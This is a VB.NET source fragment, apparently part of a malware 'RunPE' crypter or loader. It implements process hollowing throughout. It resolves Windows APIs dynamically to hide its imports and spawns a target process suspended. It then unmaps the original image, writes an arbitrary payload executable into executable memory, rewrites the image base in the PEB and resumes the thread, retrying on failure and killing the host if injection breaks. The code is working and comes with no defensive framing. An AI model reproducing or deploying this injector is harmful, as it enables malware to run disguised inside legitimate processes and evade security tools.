Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
#End Region
#Region "Dynamic API Caller"
Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
End Function
#End Region
#Region "Dynamic API's"
Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")
Private Delegate Function CreateProcessParameters( _
ByVal ApplicationName As String, _
ByVal CommandLine As String, _
ByVal ProcessAttributes As IntPtr, _
ByVal ThreadAttributes As IntPtr, _
ByVal InheritHandles As Boolean, _
ByVal CreationFlags As UInteger, _
ByVal Environment As IntPtr, _
ByVal CurrentDirectory As String, _
ByRef StartupInfo As STARTUPINFO, _
ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")
Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
ByVal ProcessInformationClass As Integer, _
ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
ByVal ProcessInformationLength As UInteger, _
ByRef ReturnLength As UIntPtr) As UInteger
ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")
Private Delegate Function GetThreadContext64Parameters( _
ByVal hThread As IntPtr, _
ByRef lpContext As CONTEXT32) As Boolean
Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing
Private Delegate Function IsWow64ProcessParameters( _
ByVal hProcess As IntPtr, _
ByRef Wow64Process As Boolean) As Boolean
ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")
Private Delegate Function WriteProcessMemoryParameters( _
ByVal hProcess As IntPtr, _
ByVal lpBaseAddress As IntPtr, _
ByVal lpBuffer As Byte(), _
ByVal nSize As UInteger, _
ByRef lpNumberOfBytesWritten As UInteger) As Boolean
ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")
Private Delegate Function NtUnmapViewOfSectionParameters( _
ByVal hProcess As IntPtr, _
ByVal pBaseAddress As IntPtr) As UInteger
ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")
Private Delegate Function VirtualAllocExParameters( _
ByVal hProcess As IntPtr, _
ByVal lpAddress As IntPtr, _
ByVal dwSize As UInteger, _
ByVal flAllocationType As UInteger, _
ByVal flProtect As UInteger) As IntPtr
ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")
Private Delegate Function ResumeThreadParameters( _
ByVal hThread As IntPtr) As UInteger
ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")
#End Region
#Region "API Structures"
Private Structure PROCESS_INFORMATION
Public hProcess As IntPtr
Public hThread As IntPtr
Public dwProcessId As UInteger
Public dwThreadId As UInteger
End Structure
Private Structure STARTUPINFO
Public cb As UInteger
Public lpReserved As String
Public lpDesktop As String
Public lpTitle As String
<Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
Public Misc As Byte()
Public lpReserved2 As Byte
Public hStdInput As IntPtr
Public hStdOutput As IntPtr
Public hStdError As IntPtr
End Structure
Structure FLOATING_SAVE_AREA
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInteger
End Structure
Structure CONTEXT32
Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
Dim FloatSave As FLOATING_SAVE_AREA
Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
<System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
End Structure
Structure PROCESS_BASIC_INFORMATION
Public ExitStatus As IntPtr
Public PebBaseAddress As IntPtr
Public AffinityMask As IntPtr
Public BasePriority As IntPtr
Public UniqueProcessID As IntPtr
Public InheritedFromUniqueProcessId As IntPtr
End Structure
#End Region
#Region "Injection"
Public Function start(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
For I As Integer = 1 To 5
If HandleRun(path, payload, creationflag) Then Return True
Next
Return False
End Function
Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
Dim ReadWrite As Integer = Nothing
Dim QuotedPath As String = String.Format("""{0}""", Path)
Dim SI As New STARTUPINFO
Dim PI As New PROCESS_INFORMATION
SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data
Try
'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()
'COMMENT: Defines some variables we need in the next process
Dim ProccessInfo As New PROCESS_BASIC_INFORMATION
Dim RetLength As UInteger
Dim Context = Nothing
Dim PEBAddress32 As Integer = Nothing
Dim PEBAddress64 As Int64 = Nothing
Dim TargetIs64 As Boolean = Nothing
Dim IsWow64Proc As Boolean = False
IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
Context = New CONTEXT32
Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
Console.WriteLine(Context.Ebx)
PEBAddress32 = Context.Ebx
TargetIs64 = False
Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here.
NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
PEBAddress32 = ProccessInfo.PebBaseAddress
TargetIs64 = False
End If
Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here.
NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
PEBAddress64 = ProccessInfo.PebBaseAddress
TargetIs64 = True
End If
Dim BaseAddress As IntPtr
If TargetIs64 = True Then
ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
Else
ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
End If
Dim PayloadIs64 As Boolean = False
Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value
If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
Else : PayloadIs64 = False : End If
If PayloadIs64 = False Then
If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
End If
End If
Dim dwImageBase As Integer
If PayloadIs64 = True Then
dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space
Else
dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
End If
If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
End If
Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
If dwNewImageBase = 0 Then Throw New Exception()
Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target
'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
For I As Integer = 0 To NumberOfSections - 1
Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
If Not SizeOfRawData = 0 Then
Dim SectionData(SizeOfRawData - 1) As Byte
Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
End If
SectionOffset += &H28
Next
Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
If TargetIs64 = True Then
If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target
Else
If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target
End If
If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data
Catch ex As Exception
Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
If P IsNot Nothing Then P.Kill()
Return False
End Try
Return True
End Function
#End Region
End Class